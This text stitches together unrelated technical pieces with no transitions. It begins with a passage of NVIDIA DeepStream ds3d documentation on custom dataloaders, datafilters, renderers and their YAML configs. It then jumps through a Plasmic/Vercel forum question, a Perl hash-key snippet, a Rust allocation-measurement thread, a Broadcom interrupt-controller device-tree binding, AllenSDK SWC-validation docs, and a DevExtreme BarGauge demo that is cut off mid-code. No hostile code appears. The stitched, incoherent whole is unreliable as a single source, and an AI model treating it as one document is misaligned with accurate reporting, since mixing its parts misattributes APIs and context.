custom_create_function: createRealsenseDataloader
config_body:
streams: [color, depth]
A custom dataloader must have type: ds3d::dataloader. It is created by an explicit call of NvDs3D_CreateDataLoaderSrc(srcConfig, loaderSrc, start) with the full component YAML content. During this call, custom_lib_path is loaded and a specific data loader is created via custom_create_function. A GstAppsrc object is also created into loaderSrc.gstElement.
GstAppsrc manages the ds3d::dataloader dataflows. This ds3d::dataloader component can be started automatically by the gst-pipeline or manually by an application call.
GuardDataLoader dataloader = loaderSrc.customProcessor;
ErrCode c = dataloader.start();
To stop the dataloader, you can set the GstAppsrc state to GST_STATE_READY, or stop it manually.
GuardDataLoader dataloader = loaderSrc.customProcessor;
ErrCode c = dataloader.stop();
Dataloader in User Application
Examples:
#include <ds3d/common/hpp/dataloader.hpp>
GuardDataLoader dataloader;
dataloader.reset(createTestTimeDataloader()); // create a specific ABI reference
ErrCode c = dataloader.setErrorCallback([](ErrCode c, const char*){});
c = dataloader.start(yamlconfig); // check result.
while(isGood(c)) {
GuardDataMap data;
c = dataloader.readData(data);
// process data
}
c = dataloader.flush();
c = dataloader.stop();
GuardDataLoader provides safe access to abiDataLoader. Once created, it maintains the reference pointer to the dataloader.
Implement a Custom Dataloader
Examples:
#include <ds3d/common/impl/impl_dataloader.h>
class TestTimeDataLoader : public ds3d::impl::SyncImplDataLoader {
public:
TestTimeDataLoader() = default;
protected:
ErrCode startImpl(const std::string& content, const std::string& path) override
{
setOutputCaps("ds3d/datamap");
return ErrCode::kGood;
}
ErrCode readDataImpl(GuardDataMap& datamap) override
{
datamap.reset(NvDs3d_CreateDataHashMap());
static uint64_t iTime = 0;
TimeStamp t{iTime++, 0, 0};
datamap.setData("time", t);
emitError(ErrCode::kGood, "timstamp added");
return ErrCode::kGood;
}
ErrCode stopImpl() override { return ErrCode::kGood; }
ErrCode flushImpl() override { return ErrCode::kGood; }
};
DS3D_EXTERN_C_BEGIN
DS3D_EXPORT_API abiRefDataLoader*
createTestTimeDataloader()
{
return NewAbiRef<abiDataLoader>(new TestTimeDataLoader);
}
DS3D_EXTERN_C_END
As shown in the example above, you derive the dataloader from the ds3d::impl::SyncImplDataLoader class and implement interfaces for the following:
ErrCode startImpl(const std::string& content, const std::string& path) override;
ErrCode readDataImpl(GuardDataMap& datamap) override;
ErrCode stopImpl() override;
ErrCode flushImpl() override;
To load this custom lib through NvDs3D_CreateDataLoaderSrc, you’ll also need to export createTestTimeDataloader.
ds3d::datafilter- Loads Custom Lib for Input and Output Processing
Load And Manage Datafilter
Examples:
name: point2cloud_datafilter
type: ds3d::datafilter
in_caps: ds3d/datamap
out_caps: ds3d/datamap
custom_lib_path: libnvds_3d_depth2point_datafilter.so
custom_create_function: createDepth2PointFilter
config_body:
A custom datafilter must have type: ds3d::datafilter. It is loaded through the nvds3dfilter Gst-plugin and started by gst_element_set_state(GST_STATE_READY). During this call, custom_lib_path is loaded and a specific data filter is created by custom_create_function. The nvds3dfilter Gst-plugin has config-content and config-file properties; one of them must be set so that a datafilter object can be created.
Datafilter in User Application
Examples:
#include <ds3d/common/hpp/datafilter.hpp>
GuardDataFilter datafilter;
datafilter.reset(createTestFakeDatafilter()); // create a specific ABI reference
ErrCode c = datafilter.setErrorCallback([](ErrCode c, const char*){});
c = datafilter.start(yamlconfig); // check result.
int consumedNum = 0;
auto dataConsumed = [&consumedNum](ErrCode c, const abiRefDataMap* data) {
if (isGood(c)) {
++consumedNum;
}
};
for (int i = 0; i < 100; ++i) {
TimeStamp t{i, 0, 0};
GuardDataMap dataIn;
dataIn.reset(NvDs3d_CreateDataHashMap());
dataIn.setData("time", t);
GuardDataMap dataOut;
ErrCode cbCode = ErrCode::kGood;
auto outputCB = [&dataOut, &cbCode](ErrCode c, const abiRefDataMap* data) {
cbCode = c;
if (data) {
GuardDataMap newData(*data);
dataOut = newData;
}
};
c = datafilter.process(dataIn, dataConsumed, outputCB);
}
c = datafilter.flush();
c = datafilter.stop();
GuardDataFilter provides safe access to the abiDataFilter. Once created, it maintains the reference pointer to the datafilter.
Implement a Custom Datafilter
Examples:
#include <ds3d/common/impl/impl_datafilter.h>
class TestFakeDataFilter : public impl::BaseImplDataFilter {
public:
TestFakeDataFilter() = default;
protected:
ErrCode startImpl(const std::string& content, const std::string& path) override
{
setInputCaps(kFakeCapsMetaName);
setOutputCaps(kFakeCapsMetaName);
return ErrCode::kGood;
}
ErrCode processImpl(
GuardDataMap datamap, OnGuardDataCBImpl outputDataCb,
OnGuardDataCBImpl inputConsumedCb) override
{
DS_ASSERT(datamap);
TimeStamp t;
ErrCode c = datamap.getData("time", t);
if (!isGood(c)) {
return c;
}
t.t0 += 1;
inputConsumedCb(ErrCode::kGood, datamap);
c = datamap.setData("time", t);
if (!isGood(c)) {
return c;
}
outputDataCb(ErrCode::kGood, datamap);
return ErrCode::kGood;
}
ErrCode flushImpl() override { return ErrCode::kGood; }
ErrCode stopImpl() override { return ErrCode::kGood; }
};
DS3D_EXTERN_C_BEGIN
DS3D_EXPORT_API abiRefDataFilter*
createTestFakeDatafilter()
{
return NewAbiRef<abiDataFilter>(new TestFakeDataFilter);
}
DS3D_EXTERN_C_END
As shown in the example above, you’ll need to derive the datafilter from the ds3d::impl::BaseImplDataFilter class, and implement interfaces for the following:
ErrCode startImpl(const std::string& content, const std::string& path) override;
ErrCode processImpl(
GuardDataMap datamap, OnGuardDataCBImpl outputDataCb,
OnGuardDataCBImpl inputConsumedCb) override;
ErrCode stopImpl() override;
ErrCode flushImpl() override;
To load this custom lib through nvds3dfilter Gst-plugin, you’ll also need to export a specific symbol createTestFakeDatafilter.
ds3d::datarender - Loads Custom Lib for Data Rendering
Load And Manage Datarender
Examples:
name: point-render
type: ds3d::datarender
in_caps: ds3d/datamap
custom_lib_path: libnvds_3d_gl_datarender.so
custom_create_function: createPointCloudDataRender
config_body:
title: ds3d-point-cloud-test
A custom datarender must have type: ds3d::datarender. It is created by an explicit call of NvDs3D_CreateDataRenderSink(sinkConfig, renderSink, start) with the full component YAML content. During this call, custom_lib_path is loaded and a specific data render is created via custom_create_function. A GstAppsink object is also created into renderSink.gstElement.
GstAppsink manages the ds3d::datarender dataflows. This ds3d::datarender component can be started automatically by the gst-pipeline or manually by an application call.
GuardDataRender datarender = renderSink.customProcessor;
ErrCode c = datarender.start();
To stop the datarender, you can set the GstAppsink state to GST_STATE_READY, or stop it manually.
GuardDataRender datarender = renderSink.customProcessor;
ErrCode c = datarender.stop();
Datarender in User Application
Examples:
#include <ds3d/common/hpp/datarender.hpp>
GuardDataRender datarender;
datarender.reset(createTestFakedatarender());
ErrCode c = datarender.setErrorCallback([](ErrCode c, const char*){});
c = datarender.start(yamlconfig); // check result.
for (int i = 0; i < 100; ++i) {
static uint64_t iTime = 0;
TimeStamp t{iTime++, 0, 0};
GuardDataMap datamap;
datamap.reset(NvDs3d_CreateDataHashMap());
ASSERT_TRUE(datamap);
datamap.setData("time", t);
if (i == 0) {
c = datarender.preroll(datamap);
}
auto dataRendered = [](ErrCode, const abiRefDataMap*) { /* rendering done */ };
c = datarender.render(datamap, dataRendered);
}
c = datarender.flush();
c = datarender.stop();
GuardDataRender provides safe access to abiDataRender. Once created, it maintains the reference pointer to the datarender. preroll is called only once, to initialize some resources.
Implement a Custom Datarender
Examples:
#include <ds3d/common/impl/impl_datarender.h>
class TestFakeDataRender : public impl::BaseImplDataRender {
public:
TestFakeDataRender() = default;
protected:
ErrCode startImpl(const std::string& content, const std::string& path) override
{
setInputCaps("ds3d/datamap");
return ErrCode::kGood;
}
ErrCode prerollImpl(GuardDataMap datamap) override { return ErrCode::kGood; }
ErrCode renderImpl(GuardDataMap datamap, OnGuardDataCBImpl dataDoneCb) override
{
DS_ASSERT(datamap);
emitError(ErrCode::kGood, "data rendered");
dataDoneCb(ErrCode::kGood, datamap);
return ErrCode::kGood;
}
ErrCode flushImpl() override { return ErrCode::kGood; }
ErrCode stopImpl() override { return ErrCode::kGood; }
};
DS3D_EXTERN_C_BEGIN
DS3D_EXPORT_API abiRefDataRender*
createTestFakedatarender()
{
return NewAbiRef<abiDataRender>(new TestFakeDataRender());
}
DS3D_EXTERN_C_END
As shown in the example above, you’ll need to derive datarender from the ds3d::impl::BaseImplDataRender class, and implement interfaces for the following:
ErrCode startImpl(const std::string& content, const std::string& path) override;
ErrCode prerollImpl(GuardDataMap datamap) override;
ErrCode renderImpl(GuardDataMap datamap, OnGuardDataCBImpl dataDoneCb) override;
ErrCode stopImpl() override;
ErrCode flushImpl() override;
To load this custom lib through NvDs3D_CreateDataRenderSink, you’ll also need to export a specific symbol createTestFakedatarender.
DS3D GuardDataMap Buffer Management
DS3D Data Map Read
DS3D defines the class object ds3d::abiRefDataMap. All internal data is hashed and stored in this data map. NvDs3DBuffer is defined to store the 3D datamap in a GstBuffer. The header file is nvds3d_meta.h.
struct NvDs3DBuffer {
uint32_t magicID; // must be 'DS3D'
ds3d::abiRefDataMap* datamap;
};
Warning
Do not use the datamap directly. The easy and safe way to access it is through GuardDataMap. See the sample code in DS_3D_Depth_Camera.
Example:
#include <ds3d/common/hpp/datamap.hpp>
#include <ds3d/common/hpp/frame.hpp>
if (NvDs3D_IsDs3DBuf(gstBuf)) {
const abiRefDataMap* refDataMap = nullptr;
ErrCode c = NvDs3D_Find1stDataMap(gstBuf, refDataMap);
... // check error code
if (refDataMap) {
GuardDataMap dataMap(*refDataMap);
FrameGuard pointFrame;
c = dataMap.getGuardData(kPointXYZ, pointFrame); // get 3D points reference.
... // check error code
FrameGuard uvCoord;
c = dataMap.getGuardData(kPointCoordUV, uvCoord); // get 3D points UV coordinates reference.
... // check error code
Frame2DGuard depthFrame;
c = dataMap.getGuardData(kDepthFrame, depthFrame); // get depth frame reference.
... // check error code
DepthScale scale;
c = dataMap.getData(kDepthScaleUnit, scale); // copy depth scale
... // check error code
}
}
DS3D Data Map Write
Create an empty datamap and store some frames into it. Example:
#include <ds3d/common/hpp/datamap.hpp>
#include <ds3d/common/hpp/frame.hpp>
#include <ds3d/common/impl/impl_frames.h>
GuardDataMap datamap(NvDs3d_CreateDataHashMap(), true); // set true to take the reference ownership.
/* Create depth frame and store them into ds3d datamap. */
// Assume depth datatype: Uint16
{
Frame2DPlane depthPlane = {640, 480, 640 * sizeof(uint16_t) , sizeof(uint16_t), 0};
uint32_t depthBytesPerFrame = depthPlane.pitchInBytes * depthPlane.height;
std::vector<uint8_t> data(depthBytesPerFrame); // Depth data
void* dataPtr = &data[0];
// create depth 2D frame
Frame2DGuard depthFrame = Wrap2DFrame<uint16_t, FrameType::kDepth>(
dataPtr, {depthPlane}, depthBytesPerFrame, MemType::kCpu, 0,
[data = std::move(data)](void*) {});
c = datamap.setGuardData(kDepthFrame, depthFrame); // store depthFrame reference into datamap.
... // check error code
DepthScale scale{0.001, {nullptr}}; // depth unit: meters per depth value
c = datamap.setData(kDepthScaleUnit, scale); // copy depth scale into datamap.
... // check error code
}
/* Create color image frame and store them into ds3d datamap. */
// Assume format is RGBA
{
Frame2DPlane colorPlane = {1920, 1080, 1920 * 4 * sizeof(uint8_t), 4 * sizeof(uint8_t), 0}; // RGBA: 4 bytes per pixel
uint32_t colorBytesPerFrame = colorPlane.pitchInBytes * colorPlane.height;
std::vector<uint8_t> data(colorBytesPerFrame); // Image data
void* dataPtr = &data[0];
// create color 2D frame
Frame2DGuard colorFrame = Wrap2DFrame<uint8_t, FrameType::kColorRGBA>(
dataPtr, {colorPlane}, colorBytesPerFrame, MemType::kCpu, 0,
[data = std::move(data)](void*) {});
c = datamap.setGuardData(kColorFrame, colorFrame); // store colorFrame reference into datamap.
... // check error code
}
/* Create 3D points frame and store them into ds3d datamap. */
{
uint32_t pointNum = 640 * 480;
std::vector<vec3f> points(pointNum); // 3D points data
vec3f* pointPtr = &points[0];
FrameGuard pointsFrame = wrapPointXYZFrame<float>(
(void*)pointPtr, pointNum, MemType::kCpu, 0, [points = std::move(points)](void*) {});
c = datamap.setGuardData(kPointXYZ, pointsFrame); // store 3d-points XYZ data reference into datamap.
... // check error code
std::vector<vec3f> uvData(pointNum); // UV coordinate data
vec3f* uvPtr = &uvData[0];
FrameGuard pointUvCoord = wrapPointCoordUVFrame<float>(
(void*)uvPtr, pointNum, MemType::kCpu, 0, [uvData = std::move(uvData)](void*) {});
c = datamap.setGuardData(kPointCoordUV, pointUvCoord); // store 3d-points UV coordinate data reference into datamap.
... // check error code
}
The example below shows how to create a new GstBuffer with a ds3d datamap.
// Assume ``GuardDataMap datamap`` is ready
GstBuffer* gstBuf = nullptr;
ErrCode c = NvDs3D_CreateGstBuf(gstBuf, datamap.abiRef(), false); // set false to increase reference count.
... // check error code
The example below shows how to update an existing DS3D GstBuffer with a new ds3d datamap.
// Assume ``GuardDataMap datamap`` is ready
// Assume ``GstBuffer* gstBuf`` is created by another component
ErrCode c = NvDs3D_UpdateDataMap(gstBuf, datamap.abiRef(), false); // set false to increase reference count.
... // check error code
Custom Libs Configuration Specifications
Components Common Configuration Specifications
ds3d common configuration specifications:
• type - Custom processor type. Type: String, one of [ds3d::dataloader, ds3d::datafilter, ds3d::datarender]. Example: type: ds3d::dataloader
• name - User-defined component name. Type: String. Example: name: depthloader
• in_caps - Gst sink caps for the component. Type: String. Example: in_caps: ds3d/datamap
• out_caps - Gst src caps for the component. Type: String. Example: out_caps: ds3d/datamap
• custom_lib_path - Path of the custom lib. Type: String. Example: custom_lib_path: libnvds_3d_gl_datarender.so
• custom_create_function - Custom function that creates the specific ds3d processing component. Type: String. Example: custom_create_function: createPointCloudDataRender
• config_body - YAML content specific to the custom component. Type: String. Example: config_body: { in_streams: [color, depth], max_points: 407040 }
libnvds_3d_dataloader_realsense Configuration Specifications
Configuration for Realsense Dataloader Header:
name: realsense_dataloader
type: ds3d::dataloader
out_caps: ds3d/datamap
custom_lib_path: libnvds_3d_dataloader_realsense.so
custom_create_function: createRealsenseDataloader
libnvds_3d_dataloader_realsense.so requires you to install librealsense2 SDK. For x86, follow the instructions from https://github.com/IntelRealSense/librealsense/blob/master/doc/distribution_linux.md. For Jetson platform, follow the instructions from https://github.com/IntelRealSense/librealsense/blob/master/doc/installation_jetson.md.
libnvds_3d_dataloader_realsense config_body fields:
• streams - Specify which streams to enable. Type: List[String], select from [color, depth]. Example: streams: [color, depth]
• aligned_image_to_depth - Indicate whether the color image is aligned to depth. Type: Boolean. Example: aligned_image_to_depth: False
libnvds_3d_depth2point_datafilter Configuration Specifications
Configuration for Depth to Points Header:
name: depth2points
type: ds3d::datafilter
in_caps: ds3d/datamap
out_caps: ds3d/datamap
custom_lib_path: libnvds_3d_depth2point_datafilter.so
custom_create_function: createDepth2PointFilter
libnvds_3d_depth2point_datafilter config_body fields:
• streams - Specify which streams to enable. Type: List[String], select from [color, depth]. Example: streams: [color, depth]
• max_points - Maximum number of 3D points to allocate. Type: Uint32. Example: max_points: 407040
• mem_pool_size - Maximum buffer pool size. Type: Uint32. Example: mem_pool_size: 8
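Putting the header and these fields together, a complete depth-to-points filter component could look like this (assembled from the examples above; not a tested configuration):
name: depth2points
type: ds3d::datafilter
in_caps: ds3d/datamap
out_caps: ds3d/datamap
custom_lib_path: libnvds_3d_depth2point_datafilter.so
custom_create_function: createDepth2PointFilter
config_body:
  streams: [color, depth]
  max_points: 407040
  mem_pool_size: 8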
libnvds_3d_gl_datarender Configuration Specifications
Configuration Common header for libnvds_3d_gl_datarender:
name: depth-point-render
type: ds3d::datarender
in_caps: ds3d/datamap
custom_lib_path: libnvds_3d_gl_datarender.so
Configuration Body for Common Part:
libnvds_3d_gl_datarender config_body common fields:
• title - Window title. Type: String. Example: title: ds3d-point-cloud-test
• streams - Which streams to render; a depth render must have [depth], a 3D point render must have [points]. Type: List[String], select from [color, depth, points]. Example: streams: [color, depth]
• width - Window width. Type: UINT32. Example: width: 1280
• height - Window height. Type: UINT32. Example: height: 720
• block - Run the rendering thread in block mode. Type: Boolean. Example: block: True
Configuration Header for Point Cloud Render:
name: point-3D-render
type: ds3d::datarender
in_caps: ds3d/datamap
custom_lib_path: libnvds_3d_gl_datarender.so
custom_create_function: createPointCloudDataRender # specific function for 3D point rendering
Configuration Header for Lidar data Render:
name: lidar-data-render
type: ds3d::datarender
in_caps: ds3d/datamap
custom_lib_path: libnvds_3d_gl_datarender.so
custom_create_function: createLidarDataRender # specific function for Lidar point cloud rendering
Configuration Body for 3D Point Cloud and Lidar Render Part:
For more details on the 3D coordinate system, refer to https://learnopengl.com/Getting-started/Coordinate-Systems. For the meaning of the view_position, view_target and view_up values, refer to gluLookAt: https://www.khronos.org/registry/OpenGL-Refpages/gl2.1/xhtml/gluLookAt.xml. For the meaning of near, far and fov, refer to gluPerspective: https://www.khronos.org/registry/OpenGL-Refpages/gl2.1/xhtml/gluPerspective.xml.
libnvds_3d_gl_datarender point cloud render config_body fields:
• view_position - View position, [x, y, z] coordinates. Type: List[Float]. Example: view_position: [0, 0, -1]
• view_target - View target, [x, y, z] coordinates. Type: List[Float]. Example: view_target: [0, 0, 1]
• view_up - View up direction, [x, y, z] coordinates. Type: List[Float]. Example: view_up: [0, -1.0, 0]
• near - Perspective projection near plane. Type: Float. Example: near: 0.01
• far - Perspective projection far plane. Type: Float. Example: far: 10.0
• fov - Perspective projection field of view, in degrees. Type: Float. Example: fov: 40.0
• coord_y_opposite - Texture map V direction; the Realsense coordinate system differs from the GLES default. Type: Boolean. Example: coord_y_opposite: False
• positive_z_only - Whether to render only points with positive z (skip negative depth values). Type: Boolean. Example: positive_z_only: False
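Assembling the common and point-cloud-specific fields, a full 3D point cloud render component could look like this (values taken from the examples above; not a tested configuration):
name: point-3D-render
type: ds3d::datarender
in_caps: ds3d/datamap
custom_lib_path: libnvds_3d_gl_datarender.so
custom_create_function: createPointCloudDataRender
config_body:
  title: ds3d-point-cloud-test
  streams: [color, points]
  width: 1280
  height: 720
  block: True
  view_position: [0, 0, -1]
  view_target: [0, 0, 1]
  view_up: [0, -1.0, 0]
  near: 0.01
  far: 10.0
  fov: 40.0
  coord_y_opposite: False
  positive_z_only: False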
Configuration Body for Lidar Render Specific Part:
libnvds_3d_gl_datarender lidar render extra config_body fields:
• view_position - View position, [x, y, z] coordinates. Type: List[Float]. Example: view_position: [0, 0, -1]
• view_target - View target, [x, y, z] coordinates. Type: List[Float]. Example: view_target: [0, 0, 1]
• view_up - View up direction, [x, y, z] coordinates. Type: List[Float]. Example: view_up: [0, -1.0, 0]
• near - Perspective projection near plane. Type: Float. Example: near: 0.01
• far - Perspective projection far plane. Type: Float. Example: far: 10.0
• fov - Perspective projection field of view, in degrees. Type: Float. Example: fov: 40.0
• lidar_color - Lidar data display color. Type: List[Uint32]. Example: lidar_color: [0, 255, 0]
• element_size - Lidar data element size, e.g. 4 for XYZI or 3 for XYZ. Type: Uint32. Example: element_size: 4
• lidar_data_key - Lidar data frame key in the datamap; the default value is DS3D::LidarXYZI. Type: String. Example: lidar_data_key: DS3D::LidarXYZI
• lidar_bbox_key - Lidar 3D bounding box data key in the datamap; the default value is DS3D::Lidar3DBboxRawData. Type: String. Example: lidar_bbox_key: DS3D::Lidar3DBboxRawData
Configuration Header for Depth and Color 2D Render:
name: depth-2D-render
type: ds3d::datarender
in_caps: ds3d/datamap
custom_lib_path: libnvds_3d_gl_datarender.so
custom_create_function: createDepthStreamDataRender # specific function for 2D depth rendering
Configuration Body for Depth and Color 2D Specific Part:
libnvds_3d_gl_datarender 2D depth render config_body fields:
• min_depth - Minimum depth value; values below it are removed from the rendering. Type: Float. Example: min_depth: 0.3
• max_depth - Maximum depth value; values above it are removed from the rendering. Type: Float. Example: max_depth: 2.0
• min_depth_color - Rendering color for the minimum depth, as [R, G, B]. Type: List[Uint32]. Example: min_depth_color: [255, 128, 0]
• max_depth_color - Rendering color for the maximum depth, as [R, G, B]. Type: List[Uint32]. Example: max_depth_color: [0, 128, 255]
libnvds_3d_depth_datasource Depth file source Specific Configuration Specifications
Configuration header:
name: depthfilesource
type: ds3d::dataloader
out_caps: ds3d/datamap, framerate=30/1
custom_lib_path: libnvds_3d_depth_datasource.so
custom_create_function: createDepthColorLoader
Configuration body:
libnvds_3d_depth_datasource depth file source config_body fields:
• depth_source - File path of the depth source. Type: String. Example: depth_source: depth_uint16_640x480.bin
• color_source - File path of the color image source. Type: String. Example: color_source: color_rgba_1920x1080.bin
• depth_scale - Depth unit, in meters per depth value. Type: Float. Example: depth_scale: 0.0010
• depth_datatype - Depth datatype; only [uint16] is supported in this version. Type: String, must be uint16. Example: depth_datatype: uint16
• depth_size - Depth resolution as [width, height]. Type: List[Uint32]. Example: depth_size: [640, 480]
• color - Color format; only rgba is supported. Type: String, must be rgba. Example: color: rgba
• color_size - Color resolution as [width, height]. Type: List[Uint32]. Example: color_size: [1920, 1080]
• depth_intrinsic - Depth sensor intrinsic parameter group. Type: Intrinsic Configuration Group. Example: depth_intrinsic: { width: 848, height: 480, centerX: 424.06073, centerY: 237.75032, fx: 422.513062, fy: 422.513062 }
• color_intrinsic - Color sensor intrinsic parameter group. Type: Intrinsic Configuration Group. Example: color_intrinsic: { width: 1920, height: 1080, centerX: 964.288086, centerY: 533.287354, fx: 1358.21423, fy: 1358.2533 }
• depth_to_color_extrinsic - Extrinsic parameters from the depth sensor to the color sensor. Type: Extrinsic Configuration Group. Example: depth_to_color_extrinsic: { rotation: [1, -0.0068, 0.0010, 0.0068, 1, 0, -0.0010, 0, 1], translation: [0.01481, -0.0001, 0.0002] }
Configuration Body for Intrinsic Parameters:
libnvds_3d_depth_datasource intrinsic parameters in depth file source config_body fields:
• width - Sensor width in pixels. Type: Uint32. Example: width: 848
• height - Sensor height in pixels. Type: Uint32. Example: height: 480
• centerX - Coordinate axis position in pixels, in the horizontal direction. Type: Float. Example: centerX: 424.06
• centerY - Coordinate axis position in pixels, in the vertical direction. Type: Float. Example: centerY: 533.28
• fx - Focal length in pixels, in the X direction. Type: Float. Example: fx: 1358.21
• fy - Focal length in pixels, in the Y direction. Type: Float. Example: fy: 1358.25
Configuration Body for Extrinsic Parameters:
libnvds_3d_depth_datasource extrinsic parameters in depth file source config_body fields:
• rotation - Extrinsic 3x3 rotation matrix, values in column-major order. Type: List[Float]. Example: rotation: [1, -0.0068, 0.0010, 0.0068, 1, 0, -0.0010, 0, 1]
• translation - Extrinsic 3x1 translation vector, values in column-major order. Type: List[Float]. Example: translation: [0.01481, -0.0001, 0.0002]
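For reference, a complete depth file source component assembled from the field examples above could look like this (example values only; not a tested configuration):
name: depthfilesource
type: ds3d::dataloader
out_caps: ds3d/datamap, framerate=30/1
custom_lib_path: libnvds_3d_depth_datasource.so
custom_create_function: createDepthColorLoader
config_body:
  depth_source: depth_uint16_640x480.bin
  color_source: color_rgba_1920x1080.bin
  depth_scale: 0.0010
  depth_datatype: uint16
  depth_size: [640, 480]
  color: rgba
  color_size: [1920, 1080]
  depth_intrinsic:
    width: 848
    height: 480
    centerX: 424.06073
    centerY: 237.75032
    fx: 422.513062
    fy: 422.513062
  color_intrinsic:
    width: 1920
    height: 1080
    centerX: 964.288086
    centerY: 533.287354
    fx: 1358.21423
    fy: 1358.2533
  depth_to_color_extrinsic:
    rotation: [1, -0.0068, 0.0010, 0.0068, 1, 0, -0.0010, 0, 1]
    translation: [0.01481, -0.0001, 0.0002]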
Relationship between the Publish button and Vercel-hosted code
It seems odd to use the Publish feature when trying to update Plasmic Studio with my Vercel-hosted code. In fact, I now have an error. To proceed, am I forced to configure my project to localhost:3000?
Am I supposed to use https://vercel.com/docs/cli? There is a Plasmic CLI, but it's only about "code generation of Plasmic components".
And is there a quicker way to switch between localhost and Vercel?
not sure what you mean, but you shouldn’t need to publish if you’re just trying to register some new code components
Well, when my project was configured to localhost, I could edit my code and see the change instantly in Plasmic.
This was great, but no developer could access my project, so I was asked by @icaro to deploy to Vercel, and I assumed I should point the project at Vercel.
Now that my project points to Vercel, do I still use localhost, and if so, how? Or does each Studio user have an independent project configuration, so each can choose to point at Vercel or localhost without affecting other users' settings?
If all users are affected by my project configuration and I have to point to Vercel, then how do I edit code and see my changes instantly in Plasmic, like I did with localhost?
My bad: I see my edit appear in Plasmic via Vercel, it just takes a minute or two. Vercel must be watching for changes on GitHub.
Still, this is an issue, as I want to work locally before pushing to GitHub.
Am I missing something?
Or just store the original key as the value of the canonicalized (lower-cased) hash. Look up in the lower case hash to find the key, then use the value of that hash to look up the value in the original hash.
#! /usr/bin/perl
%hash1 = ("John", 43, "Paul", 25, "Marie", 22);
%hash2 = ("john", 43, "Paul", 25, "marie", 22);

my %lc_hash1 = map { lc $_ => $_ } keys %hash1;

while (($KEY_2, $VALUE_2) = each %hash2) {
    if (exists $lc_hash1{lc $KEY_2}) {
        print "$KEY_2 : Matched\n";
        print "Keys are: $lc_hash1{lc $KEY_2}, $KEY_2\n";
        print "Values are: $hash1{$lc_hash1{lc $KEY_2}}, $VALUE_2\n";
    }
    else {
        print "$KEY_2 : Did not match\n";
    }
}
In reply to Re^2: Ignore Case when comparing Hash Keys by ctilmes
in thread Ignore Case when comparing Hash Keys by avidcoder
Measuring number and count of allocations
I would like to do some simple measurements of allocations. Basically create a collection of size N for various data structures, then measure the number of temporary and persistent allocations.
Ideally I would love to have something like criterion, but for memory. But since that does not seem to exist, something where I can just write a small test program that dumps a CSV for gnuplot would do as well.
There used to be a crate https://crates.io/crates/heapsize that at least allowed you to measure the total size of an object. But it is no longer supported and does not work with the current default allocator in any case.
Any recommendations on how to accomplish this in current Rust?
I don’t know if there’s a crate that already does this, but you could replace the default allocator with one that collects the statistics you want. There’s an example that does this in the alloc::System docs.
stats_alloc adds hooks to the global allocator to count allocs and deallocs.
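For what it's worth, a minimal sketch of the stats_alloc route looks roughly like this (modeled on the crate's README; treat the exact shape of the returned stats struct as an assumption and check the docs):

use std::alloc::System;
use stats_alloc::{Region, StatsAlloc, INSTRUMENTED_SYSTEM};

// Wrap the system allocator so every alloc/dealloc is counted.
#[global_allocator]
static GLOBAL: &StatsAlloc<System> = &INSTRUMENTED_SYSTEM;

fn main() {
    let reg = Region::new(&GLOBAL);
    let v: Vec<u32> = (0..1024).collect(); // the allocation under test
    // Stats delta since the region was created: allocation/deallocation
    // counts and byte totals, suitable for dumping into a CSV for gnuplot.
    println!("{:#?}", reg.change());
    drop(v);
}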
Thanks. That is what I am currently doing. Basically configure jemalloc and then measure per-thread allocations using jemalloc-ctl. Seems to work fine after some twiddling.
Swapping in a new allocator is surprisingly easy. I love rust.
Cool. Will check it out once I am done with playing with jemalloc-ctl.
Broadcom BCM7038-style Level 1 interrupt controller
This block is a first level interrupt controller that is typically connected
directly to one of the HW INT lines on each CPU. Every BCM7xxx set-top chip
since BCM7038 has contained this hardware.
Key elements of the hardware design include:
- 64, 96, 128, or 160 incoming level IRQ lines
- Most onchip peripherals are wired directly to an L1 input
- A separate instance of the register set for each CPU, allowing individual
peripheral IRQs to be routed to any CPU
- Atomic mask/unmask operations
- No polarity/level/edge settings
- No FIFO or priority encoder logic; software is expected to read all
2-5 status words to determine which IRQs are pending
Required properties:
- compatible: should be "brcm,bcm7038-l1-intc"
- reg: specifies the base physical address and size of the registers;
the number of supported IRQs is inferred from the size argument
- interrupt-controller: identifies the node as an interrupt controller
- #interrupt-cells: specifies the number of cells needed to encode an interrupt
source, should be 1.
- interrupt-parent: specifies the phandle to the parent interrupt controller(s)
this one is cascaded from
- interrupts: specifies the interrupt line(s) in the interrupt-parent controller
node; valid values depend on the type of parent interrupt controller
If multiple reg ranges and interrupt-parent entries are present on an SMP
system, the driver will allow IRQ SMP affinity to be set up through the
/proc/irq/ interface. In the simplest possible configuration, only one
reg range and one interrupt-parent is needed.
Example:
periph_intc: periph_intc@1041a400 {
compatible = "brcm,bcm7038-l1-intc";
reg = <0x1041a400 0x30 0x1041a600 0x30>;
interrupt-controller;
#interrupt-cells = <1>;
interrupt-parent = <&cpu_intc>;
interrupts = <2>, <3>;
};
allensdk.internal.morphology.validate_swc module

class allensdk.internal.morphology.validate_swc.TestNode(n, t, x, y, z, r, pn)
    Bases: object

allensdk.internal.morphology.validate_swc.main()

allensdk.internal.morphology.validate_swc.resave_swc(orig_swc, new_file)
    Reads an SWC file into an AllenSDK Morphology object and resaves it. This can
    fix some problems in an SWC file that may disrupt other software tools reading
    the file (e.g., NEURON).

    Parameters:
        orig_swc: string
            Name of SWC file to read
        new_file: string
            Name of output SWC file

allensdk.internal.morphology.validate_swc.validate_swc(swc_file)
    Tests SWC files for compatibility with the AllenSDK.

    To be compatible with NEURON, SWC files must have the following properties:
        1. a single root node with parent ID '-1'
        2. sequentially increasing ID numbers
        3. immediate children of the soma cannot branch

    To be compatible with feature analysis, SWC files can only have node types
    in the range 1-4:
        1 = soma
        2 = axon
        3 = [basal] dendrite
        4 = apical dendrite
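A validate-then-repair pass over a single file might look like the sketch below. The return contract of validate_swc is an assumption here (check the module source for whether it returns a flag or raises on failure), and the file names are placeholders:

from allensdk.internal.morphology.validate_swc import resave_swc, validate_swc

swc_in = "cell.swc"          # placeholder input file
swc_out = "cell_fixed.swc"   # placeholder output file

if not validate_swc(swc_in):     # assumed truthy-on-valid behaviour
    # Round-trip through an AllenSDK Morphology object to normalize the file
    resave_swc(swc_in, swc_out)
    validate_swc(swc_out)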
Bar Gauge
Variable Number of Bars
This demo shows how to use the API of the BarGauge to change the number of indicated values at runtime. For this purpose, an array of new values is passed as the parameter of the values method.
index.js:

$(() => {
  const productsToValues = function () {
    return $.map(products, (item) => (item.active ? item.count : null));
  };

  const gauge = $('#gauge').dxBarGauge({
    startValue: 0,
    endValue: 50,
    values: productsToValues(),
    label: {
      format: {
        type: 'fixedPoint',
        precision: 0,
      },
    },
  }).dxBarGauge('instance');

  $('#panel').append($.map(products, (product) => $('<div></div>').dxCheckBox({
    value: product.active,
    text: product.name,
